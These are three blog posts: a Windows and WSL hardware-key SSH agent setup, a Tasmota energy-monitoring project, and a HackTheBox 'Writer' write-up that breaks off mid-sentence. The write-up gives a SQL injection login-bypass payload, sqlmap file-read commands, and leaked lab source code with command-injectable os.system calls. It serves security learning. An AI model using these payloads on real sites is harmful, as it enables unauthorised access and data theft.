Agent ever again. Overview</h2> Essentially what this setup requires is a native Windows build of OpenSSH that includes support for the ed25519-sk and ecdsa-sk SSH key types. Once this is installed, we can simply forward the connection to the Windows SSH Agent service to our Linux host on WSL. Step 1: Install Native OpenSSH on Windows</h2> It's entirely possible you already have a compatible OpenSSH client. Just open PowerShell and run the following: > ssh -V OpenSSH_for_Windows_8.9p1, LibreSSL 3.4.3</code></pre> If you're version is higher than 8.9p1, you're all set! Just proceed to step 2. Otherwise continue following the instructions below. Remove Old OpenSSH Client</h3> If you installed the OpenSSH client package on Windows, you should go ahead and remove that now before you proceed. To do that quickly, run the following command: Remove-WindowsCapability -Online -Name OpenSSH.Client~~~~0.0.1.0</code></pre> Or, if you'd rather use the GUI, just see this tutorial from Microsoft</a>. Install New Client</h3> The next thing you want to do is install the beta version of OpenSSH that is on the PowerShell GitHub. The easiest way to do that is winget install "openssh beta"</code></pre> If you don't have winget, then simply head over to their wiki article</a> for more instructions. Disable and Stop SSH Server</h3> For some reason, this package installs the SSH server and enables the service by default. This is a bit of a security concern as you're serving a remote connection service to your PC. Fortunately, its pretty easy to disable this. Just run the following from an Administrator PowerShell: Stop-Service -Name sshd Set-Service -Name sshd -StartupType Disabled</code></pre> Or you can go into the services GUI and stop and disable the service. Start and Enable SSH Agent</h3> Next, you need to make sure the SSH Agent service is running and enabled. It should be by default, but if its not you can run the following: Start-Service -Name ssh-agent Set-Service -Name ssh-agent -StartupType Automatic</code></pre>Step 2: Generate SSH Keys</h2> At this point, if you're not planning on using WSL, you're actually done. You can go ahead and plugin your security key and generate your SSH keys now. I used the following command to generate my keys: Note: you may need to be in an Administrator terminal to generate the key as you're accessing the USB. This is only needed for key generation though. ssh-keygen -t ed25519-sk -O "resident" -O "verify-required" -f .\id_ed25519 -C "user@host"</code></pre> The "resident" allows the key to fully reside on the hardware key. Only do this if you have your U2F pin set (which you should). The "verify-required" forces you to enter your pin if set, as well as verifying your presence on the security key. Combining these options ensures a 2FA solution for accessing your SSH private key. It combines something you have (hardware key) with something you know (pin). Also, most hardware keys will lock after so many failed pin attempts so there's not much risk of an attacker brute forcing your pin, but you should still protect it none the less. Now, simply perform the following command to register your key with the SSH Agent service: ssh-add .\id_ed25519</code></pre> Now when you need to use your SSH key, you will get a prompt like this: </img> </center> Once you enter your pin, it should prompt you to tap your security key: </img> </center> Once you tap your security key, you should be authenticated to whatever you were trying to use your SSH key for. Step 3: Setting up WSL Integration</h2> If you're like me, you probably use WSL for pretty much everything development related on your Windows PC. Fortunately, getting your shiny new hardware based SSH key working in WSL is pretty easy thanks to some open source projects. Install npiperelay</h3> The first program you want to download is npiperelay</a>. Head over to the releasees</a> page on GitHub and download the respective Windows binary for your computer. Extract the npiperlay.exe file and place it somewhere on your C drive. I placed mine in "C:\npiperelay" to keep it simple. It helps for the next step to not have spaces in your filepath. Setup WSL Forwarding Script</h3> On the WSL side, you need to install socat</a>. It should be in your standard repositories so a simple apt install socat</code> should suffice. Next, place the following snippet I found from this GitHub gist</a> in your .bashrc or .zshrc or whatever shell you use: Note: replace "/mnt/c/niperelay/npiperelay.exe" with the path to where you placed npiperelay in the previous step. # # Set up ssh agent forwarding to host # # Include this in .bashrc # Ensure that the ssh-agent service is running on windows # build https://github.com/jstarks/npiperelay and ensure it is in your PATH (or modify the script to specify the qualified path) # Configure ssh forwarding export SSH_AUTH_SOCK=$HOME/.ssh/agent.sock # need `ps -ww` to get non-truncated command for matching # use square brackets to generate a regex match for the process we want but that doesn't match the grep command running it! ALREADY_RUNNING=$(ps -auxww | grep -q "[n]piperelay.exe -ei -s //./pipe/openssh-ssh-agent"; echo $?) if [[ $ALREADY_RUNNING != "0" ]]; then if [[ -S $SSH_AUTH_SOCK ]]; then # not expecting the socket to exist as the forwarding command isn't running (http://www.tldp.org/LDP/abs/html/fto.html) echo "removing previous socket..." rm $SSH_AUTH_SOCK fi echo "Starting SSH-Agent relay..." # setsid to force new session to keep running # set socat to listen on $SSH_AUTH_SOCK and forward to npiperelay which then forwards to openssh-ssh-agent on windows (setsid socat UNIX-LISTEN:$SSH_AUTH_SOCK,fork EXEC:"/mnt/c/npiperelay/npiperelay.exe -ei -s //./pipe/openssh-ssh-agent",nofork &) 2>&1 > /dev/null fi</code></pre> Once this is done, re-open WSL and you should see the following: removing previous socket... Starting SSH-Agent relay...</code></pre> And now when you need to use your SSH keys you should be prompted like you were on Windows. As a bonus, this works from within VS Code dev containers as well which is actually two levels of socat deep. Some people have reported that this is unstable for them, but I haven't encountered any issues with it so far. Bonus: Setting up Git Signing with SSH Key</h3> I also like to sign my Git commits with my SSH key, and you can totally do this with your hardware SSH key. Simply take the public key and add the following to your gitconfig: [user] signingkey = key::sk-ssh-ed25519@openssh.com AAAAsshpublickeybody</code></pre> Once you do that, when you perform a git commit</code> you will be prompted for your pin as demonstrated previously. GitHub also supports verifying SSH key signatures on commits and also supports the ed25519-sk key types. Finishing Up</h3> You should be all set now. I've been running this for a few weeks now without any issues. In the future, I expect the updated OpenSSH client to come to a Windows release which should simplify this process. The real magic is forwarding the Windows SSH Agent to WSL to allow you to utilize the hardware security key. Just keep in mind that your client also needs to support the key type and to have a backup hardware security key in case you lose or damage your primary key. Enjoy your new fangled SSH key setup. On a sad personal note, I was hoping for these keys to also be supported by iOS and Android via NFC, but as of yet, there are still no clients available that can use them. The blink</a> project on iOS supports generating keys via webauthn, but still doesn't support using keys generated on other devices. Hopefully in the future, they will support this functionality so that you can SSH on the go using your hardware security key. Energy Monitoring with a Tasmota Smart plug 2022-04-24T16:59:37-04:00 In this post, I will be discussing deploying an energy monitoring solution with Tasmota, Prometheus, and Grafana. Background</h2> I personally like to have a small homelab to play around with new technologies and run certain services. One aspect of this is that running a homelab 24/7 uses a certain amount of power, and the power bill can add up quickly depending on the amount of servers and network devices that are running. Because of this, I wanted to find a simple way to monitor my energy consumption month to month and see if I am actually saving money running these services locally or if it would actually be cheaper in the long run to deploy them in the cloud. For some perspective, I'm currently running three Raspberry Pi's, a Dell OptiPlex, a modem, a switch, and an old Cisco Wifi access point. I'm hosting almost all my services on Raspberry Pi's, two of which are Pi 4B's and one which is a 2B. Since these are quad core ARM processors with about 4GB of RAM, in order to break even, I need to be using less than a similar setup in the cloud, without taking into account any storage resources. In DigitalOcean right now, it costs around $15 a month to run a dual core 2GB VPS, so that should be a good break even point to run the amount of services that I am currently hosting. The Smart Plug</h2> The way I decided to implement this monitoring is through a smart plug flashed with the open source Tasmota firmware. Luckily, there also exists CloudFree which is a small company that makes custom smart plugs running a pre-configured Tasmota image. These plugs run around $13 which is fairly competitive pricing for what it offers. Many smart plugs which used to support flashing with Tasmota over Wi-fi have become much more difficult to flash as of the past few years. I wanted to remove the guessing game of if the smart plug I purchased could be flashed, and I enjoy the convenience that the plug is already flashed by default and also calibrated, which can be a somewhat finnicky process. You can also flash the CloudFree smart plug with other firmware such as ESPHome as well. You can find the CloudFree smart plug here</a> on their website. I also needed to consider the maximum load and draw of the smart plug before plugging my entire homelab into it. Thankfully, the CloudFree smart plug 2 supports a max amperage of 15 amps with a load of 1800 watts which is far beyond my current needs. Ideally, I would rather put all my devices behind a UPS anyways, but a UPS costs around $100 versus only $13 for the smart plug. I chose to put all of my homelab behind the smart plug with all of it on a single surge protector. The downside for this is that I can never actually switch the smart plug off without killing power to my entire homelab, but I will get metrics for all of my homelab collectively. Plugging in the Smart Plug</h2> The first thing I noticed when using the smart plug is that it has a light to indicate whether the power is switched on or off for the power socket. Also, when you turn the socket on, it stays on even if it loses power and gets unplugged, which means I won't have to press the power button on it every time I lose power. Following the directions that come with the smart plug, I was able to set it up and get it connected to my network. Logging into the dashboard shows the screen below. The Tasmota dashboard shows you directly the various statistics that I was trying to get into the first place. The typical use case is to scrape the smart plug by connecting it to a HomeAssistant instance, but I didn't want to deal with setting that up for simply monitoring power usage of a single plug. It turns out that if you navigate to the "/m?=1" page, it simply returns the following: {t}{s}Voltage{m}119 V{e}{s}Current{m}0.970 A{e}{s}Power{m}91 W{e}{s}Apparent Power{m}115 VA{e}{s}Reactive Power{m}70 VAr{e}{s}Power Factor{m}0.79{e}{s}Energy Today{m}1.565 kWh{e}{s}Energy Yesterday{m}2.222 kWh{e}{s}Energy Total{m}216.249 kWh{e}{t}ON</code></pre> Using this, I decided to simply parse this format and receive the metrics. Configuring the Smart Plug</h2> In addition, I did a few extra things with my smart plug. One was to add simple HTTP authentication. Now, this will obviously be plaintext across the network, but if I have someone sniffing credentials across my network, I have other issues. The main reason I did this was to prevent someone from accidentally accessing the network and turning off the socket. I did this more for the sake of doing it then actual security measures. Lastly, in order for the energy today and energy yesterday metrics to work, Tasmota needs to know the time and timezone. I did this with the following command (replacing with the current epoch time found here</a>): time <current epoch> TimeSTD 0, 1, 11, 1, 2, -300 TIMEDST 0, 2, 3, 1, 2, -240 TimeZone 99 Status 7</code></pre> The rest of the commands just set the daylight savings time configurations, and shows the current time of the smart plug. You can find more of the configuration options here</a>. Additionally, you can also setup a NTP server and have it sync off of that, which is probably easier if you already have one in your homelab. Scraping Metrics</h2> For pulling metrics, I was already using Prometheus for scraping different devices. I decided to write a custom exporter to scrape and serve the Tasmota dashboard metrics via HTTP. I also published this and wrote a Github Actions pipeline to build a Docker container for it to make deployment very simple. You can find both here on my GitHub: github.com/astr0n8t/tasmota-power-exporter</a> Using this in conjunction with Prometheus, you can have a fairly simple way to scrape the metrics directly from Tasmota without needing HomeAssistant or any other MQTT Broker. You can quickly run this in Docker Compose with the following: tasmota: image: ghcr.io/astr0n8t/tasmota-power-exporter:latest container_name: tasmota-power restart: always ports: - 8000:8000 environment: - DEVICE_IP=<Tasmota IP> - USER=<user> - PASSWORD=<password></code></pre> The Prometheus config looks something like this with the exporter running on port 8000: - job_name: "tasmota" # metrics_path defaults to '/metrics' # scheme defaults to 'http'. static_configs: - targets: ["127.0.0.1:8000"]</code></pre> With this running, now whenever Prometheus scrapes the /metrics endpoint on port 8000, the exporter requests updated metrics from the /m?=1 endpoint on the Tasmota smart plug. Visualizing the Metrics</h2> With the metrics being scraped, we can now pull those into Grafana. The dashboard can be found in the GitHub of the exporter for those interested. Most of these statistics and metrics deal with the monthly cost of the homelab. I set this up a few months ago to generate plenty of data, and it seems that my monthly average is around $7-10 a month to run my homelab. This means that I am saving money running these services on my own hardware versus in the cloud. Conclusion</h2> The end result of this project is that I now have a simple way to monitor my energy usage in my homelab. If I add a device, I can begin to see the monthly impact that has on my power bill. One thing that this project has shown me is that my Dell Optiplex serving as my firewall can probably be replaced with a more low powered solution while still having similar network performance. I'm also considering acquiring some thin clients to serve as virtualization hosts, but that's a post for a different day. If you have any questions or suggestions for this project, feel free to leave an issue on the GitHub</a>, reach out to me on Twitter @astr0n8t</a>, or leave a comment down below. Thanks for reading! HackTheBox Writer Writeup 2021-12-20T10:20:35-05:00 Writer is a Medium level box on HackTheBox that I worked through just prior to it being retired. The machine was a lot of fun, but also had many steps to gain a foothold and finally to escalate to root. It involved SQL injection, command injection, password cracking, and some scripting know how. The initial foothold is real world like with multiple paths, but the privilege escalation was much more CTF style with a very clear singular path. Enumeration</h2> The first thing to do is to add the following entry to /etc/hosts</code> 10.10.11.101 writer.htb</code></pre>Nmap</h3> From there, an nmap scan should show us all the open and listening TCP ports on the machine: └─# nmap -A -p- -T4 writer.htb Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-11 10:13 EST Nmap scan report for writer.htb (10.10.11.101) Host is up (0.096s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 98:20:b9:d0:52:1f:4e:10:3a:4a:93:7e:50:bc:b8:7d (RSA) | 256 10:04:79:7a:29:74:db:28:f9:ff:af:68:df:f1:3f:34 (ECDSA) |_ 256 77:c4:86:9a:9f:33:4f:da:71:20:2c:e1:51:10:7e:8d (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Story Bank | Writer.HTB 139/tcp open netbios-ssn Samba smbd 4.6.2 445/tcp open netbios-ssn Samba smbd 4.6.2 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.92%E=4%D=12/11%OT=22%CT=1%CU=31410%PV=Y%DS=2%DC=T%G=Y%TM=61B4C0 OS:62%P=x86_64-pc-linux-gnu)SEQ(SP=FC%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)SEQ OS:(SP=FC%GCD=1%ISR=10B%TI=Z%CI=Z%TS=A)OPS(O1=M54BST11NW7%O2=M54BST11NW7%O3 OS:=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)WIN(W1=FE88%W2=F OS:E88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54BNNSNW OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O= OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W= OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: -9s |_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required | smb2-time: | date: 2021-12-11T15:14:30 |_ start_date: N/A TRACEROUTE (using port 1025/tcp) HOP RTT ADDRESS 1 114.24 ms 10.10.10.1 2 40.20 ms writer.htb (10.10.11.101) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 102.56 seconds</code></pre> Interesting, this is an Ubuntu machine, running SSH and HTTP, which is fairly common on HackTheBox, but this box is also running Samba serving RPC and SMB. smbclient</h3> Using smbclient to list the shares we get the following: └─# smbclient -L writer.htb Enter WORKGROUP\root's password: Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers writer2_project Disk IPC$ IPC IPC Service (writer server (Samba, Ubuntu)) SMB1 disabled -- no workgroup available</code></pre> Trying to access the writer2_project</code> gives us this: └─# smbclient \\\\writer.htb\\writer2_project Enter WORKGROUP\root's password: tree connect failed: NT_STATUS_ACCESS_DENIED</code></pre> It can be assumed then that we need credentials to access this share and that guest access is disabled. HTTP</h3> Since it has HTTP running, lets just navigate to the site real quick: GoBuster</h3> My first guess looking at this would be possibly WordPress, but /wp-admin</code> does not exist, so let's run a quick gobuster against the site and see what we find. └─# gobuster dir -t 10 -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://writer.htb =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://writer.htb [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/12/11 10:16:12 Starting gobuster in directory enumeration mode =============================================================== /about (Status: 200) [Size: 3522] /administrative (Status: 200) [Size: 1443] /contact (Status: 200) [Size: 4905] /dashboard (Status: 302) [Size: 208] [--> http://writer.htb/] /logout (Status: 302) [Size: 208] [--> http://writer.htb/] /server-status (Status: 403) [Size: 275] /static (Status: 301) [Size: 309] [--> http://writer.htb/static/] =============================================================== 2021/12/11 10:19:37 Finished ===============================================================</code></pre> Based on this, /dashboard</code> is most likely behind a login, but /administrative</code> looks the most promising. Navigating there presents us with a login field: SQL Injection</h3> My first thought here is SQL injection, but some manual tricks like ';-- OR 1=1</code> doesn't show any good signs. Firing up burpsuite gets us the following request when trying username and password admin: POST /administrative HTTP/1.1 Host: writer.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://writer.htb/administrative Content-Type: application/x-www-form-urlencoded Content-Length: 26 Origin: http://writer.htb Connection: close Upgrade-Insecure-Requests: 1 uname=admin&password=admin</code></pre> Let's see what sqlmap can do with this as I have very limited experience with SQL injection: └─# sqlmap -u "http://writer.htb/administrative" --data "uname=user&password=pass" --risk 3 ___ __H__ ___ ___[.]_____ ___ ___ {1.5.11#stable} |_ -| . [)] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 10:04:57 /2021-12-11/ [10:04:58] [INFO] resuming back-end DBMS 'mysql' [10:04:58] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: uname (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: uname=user' AND (SELECT 6202 FROM (SELECT(SLEEP(5)))kXjZ) AND 'wrdL'='wrdL&password=pass --- [10:04:58] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 20.04 or 19.10 (eoan or focal) web application technology: Apache 2.4.41 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [10:04:58] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/writer.htb' [*] ending @ 10:04:58 /2021-12-11/</code></pre> sqlmap shows that this box is vulnerable to a "time-based blind" attack. Now, I went down this path because I could not find another avenue, but as this method takes a very long time, I'll inform you that it is also vulnerable to a non-blind attack which I'll further describe. Administrative login bypass</h3> Taking just the last bit of the sqlmap query and making it a little simpler, we are able to bypass the login page, using this value for admin: admin' OR 1 AND 'wrdL'='wrdL</code> Putting this into a request and url encoding the value we have: POST /administrative HTTP/1.1 Host: writer.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://writer.htb/administrative Content-Type: application/x-www-form-urlencoded Content-Length: 26 Origin: http://writer.htb Connection: close Upgrade-Insecure-Requests: 1 uname=admin'+OR+1+AND+'wrdL'%3d'wrdL&password=admin</code></pre> When this post request is sent through burpsuite, we are presented with the following page: Which then redirects us to the dashboard: Now if you notice in the top corner of this page, it actually displays the query that we sent via the POST request. I discovered after I had completed the box that you can actually get the output of your query on the Admin Redirect page which will prevent you from needing to do blind SQL injection. But alas, I did not realize this and so I will show you the blind SQL injection that I did using sqlmap. Database Privileges</h3> First, we want to get our privileges to see what we can do as the database user: └─# sqlmap -u "http://writer.htb/administrative" --data "uname=user&password=pass" --risk 3 --threads=10 --privileges database management system users privileges: [*] %admin% [1]: privilege: FILE </code></pre>Retrieving Files</h3> Retrieving Apache Sites Enabled</h4> This tells us that as the current user we can read files. Now, blind SQL injection means that this will take a very long time to read a file, and we also do not have a way to know what files will be there other than guessing. But we know that the box is running Apache on Ubuntu, so lets start with the default sites enabled configuration found at /etc/apache2/sites-enabled/000-default.conf</code> To do this we simply need to give sqlmap the --file-read=/path/to/file</code> parameter, and it will download the file for us...using blind SQL injection. This easily took 20 minutes to an hour per file as blind SQL injection is a very tedious process, but we were finally presented with the following file: # Virtual host configuration for writer.htb domain <VirtualHost *:80> ServerName writer.htb ServerAdmin admin@writer.htb WSGIScriptAlias / /var/www/writer.htb/writer.wsgi <Directory /var/www/writer.htb> Order allow,deny Allow from all </Directory> Alias /static /var/www/writer.htb/writer/static <Directory /var/www/writer.htb/writer/static/> Order allow,deny Allow from all </Directory> ErrorLog ${APACHE_LOG_DIR}/error.log LogLevel warn CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> # Virtual host configuration for dev.writer.htb subdomain # Will enable configuration after completing backend development # Listen 8080 #<VirtualHost 127.0.0.1:8080> # ServerName dev.writer.htb # ServerAdmin admin@writer.htb # # Collect static for the writer2_project/writer_web/templates # Alias /static /var/www/writer2_project/static # <Directory /var/www/writer2_project/static> # Require all granted # </Directory> # # <Directory /var/www/writer2_project/writerv2> # <Files wsgi.py> # Require all granted # </Files> # </Directory> # # WSGIDaemonProcess writer2_project python-path=/var/www/writer2_project python-home=/var/www/writer2_project/writer2env # WSGIProcessGroup writer2_project # WSGIScriptAlias / /var/www/writer2_project/writerv2/wsgi.py # ErrorLog ${APACHE_LOG_DIR}/error.log # LogLevel warn # CustomLog ${APACHE_LOG_DIR}/access.log combined # #</VirtualHost> # vim: syntax=apache ts=4 sw=4 sts=4 sr noet</code></pre> There is a lot in this file, so I will try to break it down as best I can. Basically, the file tells us that Apache is serving a "wsgi" website from the /var/www/writer.htb/</code> directory and a static website from the /var/www/writer.htb/static/</code> location. Now "wsgi" stands for Python Web Server Gateway Interface. There is also a second site commented out that used to be served on port 8080 which lines up with the writer2_project</code> SMB share we found earlier. Retrieving init.py</h4> So our next objective should be to start pulling the different files from that to see the source code of the site. One of the most popular Python web frameworks is Django, and it is common to start with the file __init__.py</code> Trying a sqlmap request for /var/www/writer.htb/writer/__init__.py</code> gives us the site just as we hoped it would. from flask import Flask, session, redirect, url_for, request, render_template from mysql.connector import errorcode import mysql.connector import urllib.request import os import PIL from PIL import Image, UnidentifiedImageError import hashlib app = Flask(__name__,static_url_path='',static_folder='static',template_folder='templates') #Define connection for database def connections(): try: connector = mysql.connector.connect(user='admin', password='ToughPasswordToCrack', host='127.0.0.1', database='writer') return connector except mysql.connector.Error as err: if err.errno == errorcode.ER_ACCESS_DENIED_ERROR: return ("Something is wrong with your db user name or password!") elif err.errno == errorcode.ER_BAD_DB_ERROR: return ("Database does not exist") else: return ("Another exception, returning!") else: print ('Connection to DB is ready!') #Define homepage @app.route('/') def home_page(): try: connector = connections() except mysql.connector.Error as err: return ("Database error") cursor = connector.cursor() sql_command = "SELECT * FROM stories;" cursor.execute(sql_command) results = cursor.fetchall() return render_template('blog/blog.html', results=results) #Define about page @app.route('/about') def about(): return render_template('blog/about.html') #Define contact page @app.route('/contact') def contact(): return render_template('blog/contact.html') #Define blog posts @app.route('/blog/post/<id>', methods=['GET']) def blog_post(id): try: connector = connections() except mysql.connector.Error as err: return ("Database error") cursor = connector.cursor() cursor.execute("SELECT * FROM stories WHERE id = %(id)s;", {'id': id}) results = cursor.fetchall() sql_command = "SELECT * FROM stories;" cursor.execute(sql_command) stories = cursor.fetchall() return render_template('blog/blog-single.html', results=results, stories=stories) #Define dashboard for authenticated users @app.route('/dashboard') def dashboard(): if not ('user' in session): return redirect('/') return render_template('dashboard.html') #Define stories page for dashboard and edit/delete pages @app.route('/dashboard/stories') def stories(): if not ('user' in session): return redirect('/') try: connector = connections() except mysql.connector.Error as err: return ("Database error") cursor = connector.cursor() sql_command = "Select * From stories;" cursor.execute(sql_command) results = cursor.fetchall() return render_template('stories.html', results=results) @app.route('/dashboard/stories/add', methods=['GET', 'POST']) def add_story(): if not ('user' in session): return redirect('/') try: connector = connections() except mysql.connector.Error as err: return ("Database error") if request.method == "POST": if request.files['image']: image = request.files['image'] if ".jpg" in image.filename: path = os.path.join('/var/www/writer.htb/writer/static/img/', image.filename) image.save(path) image = "/img/{}".format(image.filename) else: error = "File extensions must be in .jpg!" return render_template('add.html', error=error) if request.form.get('image_url'): image_url = request.form.get('image_url') if ".jpg" in image_url: try: local_filename, headers = urllib.request.urlretrieve(image_url) os.system("mv {} {}.jpg".format(local_filename, local_filename)) image = "{}.jpg".format(local_filename) try: im = Image.open(image) im.verify() im.close() image = image.replace('/tmp/','') os.system("mv /tmp/{} /var/www/writer.htb/writer/static/img/{}".format(image, image)) image = "/img/{}".format(image) except PIL.UnidentifiedImageError: os.system("rm {}".format(image)) error = "Not a valid image file!" return render_template('add.html', error=error) except: error = "Issue uploading picture" return render_template('add.html', error=error) else: error = "File extensions must be in .jpg!" return render_template('add.html', error=error) author = request.form.get('author') title = request.form.get('title') tagline = request.form.get('tagline') content = request.form.get('content') cursor = connector.cursor() cursor.execute("INSERT INTO stories VALUES (NULL,%(author)s,%(title)s,%(tagline)s,%(content)s,'Published',now(),%(image)s);", {'author':author,'title': title,'tagline': tagline,'content': content, 'image':image }) result = connector.commit() return redirect('/dashboard/stories') else: return render_template('add.html') @app.route('/dashboard/stories/edit/<id>', methods=['GET', 'POST']) def edit_story(id): if not ('user' in session): return redirect('/') try: connector = connections() except mysql.connector.Error as err: return ("Database error") if request.method == "POST": cursor = connector.cursor() cursor.execute("SELECT * FROM stories where id = %(id)s;", {'id': id}) results = cursor.fetchall() if request.files['image']: image = request.files['image'] if ".jpg" in image.filename: path = os.path.join('/var/www/writer.htb/writer/static/img/', image.filename) image.save(path) image = "/img/{}".format(image.filename) cursor = connector.cursor() cursor.execute("UPDATE stories SET image = %(image)s WHERE id = %(id)s", {'image':image, 'id':id}) result = connector.commit() else: error = "File extensions must be in .jpg!" return render_template('edit.html', error=error, results=results, id=id) if request.form.get('image_url'): image_url = request.form.get('image_url') if ".jpg" in image_url: try: local_filename, headers = urllib.request.urlretrieve(image_url) os.system("mv {} {}.jpg".format(local_filename, local_filename)) image = "{}.jpg".format(local_filename) try: im = Image.open(image) im.verify() im.close() image = image.replace('/tmp/','') os.system("mv /tmp/{} /var/www/writer.htb/writer/static/img/{}".format(image, image)) image = "/img/{}".format(image) cursor = connector.cursor() cursor.execute("UPDATE stories SET image = %(image)s WHERE id = %(id)s", {'image':image, 'id':id}) result = connector.commit() except PIL.UnidentifiedImageError: os.system("rm {}".format(image)) error = "Not a valid image file!" return render_template('edit.html', error=error, results=results, id=id) except: error = "Issue uploading picture" return render_template('edit.html', error=error, results=results, id=id) else: error = "File extensions must be in .jpg!" return render_template('edit.html', error=error, results=results, id=id) title = request.form.get('title') tagline = request.form.get('tagline') content = request.form.get('content') cursor = connector.cursor() cursor.execute("UPDATE stories SET title = %(title)s, tagline = %(tagline)s, content = %(content)s WHERE id = %(id)s", {'title':title, 'tagline':tagline, 'content':content, 'id': id}) result = connector.commit() return redirect('/dashboard/stories') else: cursor = connector.cursor() cursor.execute("SELECT * FROM stories where id = %(id)s;", {'id': id}) results = cursor.fetchall() return render_template('edit.html', results=results, id=id) @app.route('/dashboard/stories/delete/<id>', methods=['GET', 'POST']) def delete_story(id): if not ('user' in session): return redirect('/') try: connector = connections() except mysql.connector.Error as err: return ("Database error") if request.method == "POST": cursor = connector.cursor() cursor.execute("DELETE FROM stories WHERE id = %(id)s;", {'id': id}) result = connector.commit() return redirect('/dashboard/stories') else: cursor = connector.cursor() cursor.execute("SELECT * FROM stories where id = %(id)s;", {'id': id}) results = cursor.fetchall() return render_template('delete.html', results=results, id=id) #Define user page for dashboard @app.route('/dashboard/users') def users(): if not ('user' in session): return redirect('/') try: connector = connections() except mysql.connector.Error as err: return "Database Error" cursor = connector.cursor() sql_command = "SELECT * FROM users;" cursor.execute(sql_command) results = cursor.fetchall() return render_template('users.html', results=results) #Define settings page @app.route('/dashboard/settings', methods=['GET']) def settings(): if not ('user' in session): return redirect('/') try: connector = connections() except mysql.connector.Error as err: return "Database Error!" cursor = connector.cursor() sql_command = "SELECT * FROM site WHERE id = 1" cursor.execute(sql_command) results = cursor.fetchall() return render_template('settings.html', results=results) #Define authentication mechanism @app.route('/administrative', methods=['POST', 'GET']) def login_page(): if ('user' in session): return redirect('/dashboard') if request.method == "POST": username = request.form.get('uname') password = request.form.get('password') password = hashlib.md5(password.encode('utf-8')).hexdigest() try: connector = connections() except mysql.connector.Error as err: return ("Database error") try: cursor = connector.cursor() sql_command = "Select * From users Where username = '%s' And password = '%s'" % (username, password) cursor.execute(sql_command) results = cursor.fetchall() for result in results: print("Got result") if result and len(result) != 0: session['user'] = username return render_template('success.html', results=results) else: error = "Incorrect credentials supplied" return render_template('login.html', error=error) except: error = "Incorrect credentials supplied" return render_template('login.html', error=error) else: return render_template('login.html') @app.route("/logout") def logout(): if not ('user' in session): return redirect('/') session.pop('user') return redirect('/') if __name__ == '__main__': app.run("0.0.0.0")</code></pre>Initial Foothold</h2> Analyzing Django Site</h3> Again, there is a lot to this code if you have never used a Python web framework such as Django or Flask. But we can see some important information from this, first we have database credentials exposed in plaintext: connector = mysql.connector.connect(user='admin', password='ToughPasswordToCrack', host='127.0.0.1', database='writer')</code></pre> More interestingly, when we look at the /dashboard/stories/add</code> and edit</code> functions, we see calls to os.system</code> which is essentially a shell command: os.system("mv {} {}.jpg".format(local_filename, local_filename))</code></pre> At first glance, this seems like we could easily get a command to execute by just giving a filename with special characters, but upon further inspection, the local_filename</code> variable is actually pulled from the urllib.request.urlretrieve</code> function: local_filename, headers = urllib.request.urlretrieve(image_url)</code></pre> Looking at the page rendered on the site, we see the following: So we can either upload an image, or give a URL to upload from. Further research on the function which makes the local_filename</code> variable shows that it produces a random temporary filename intended for one time use, but if it is pointed at a local file through the file://</code> directive and the file exists, it simply returns the path to the file rather than making a copy of the file. Now the code also has checks to make sure that the image is valid, but when looking further at the code, these checks only exist for the URL upload files and not the file upload option. Instead, the file upload simply performs the following check: if ".jpg" 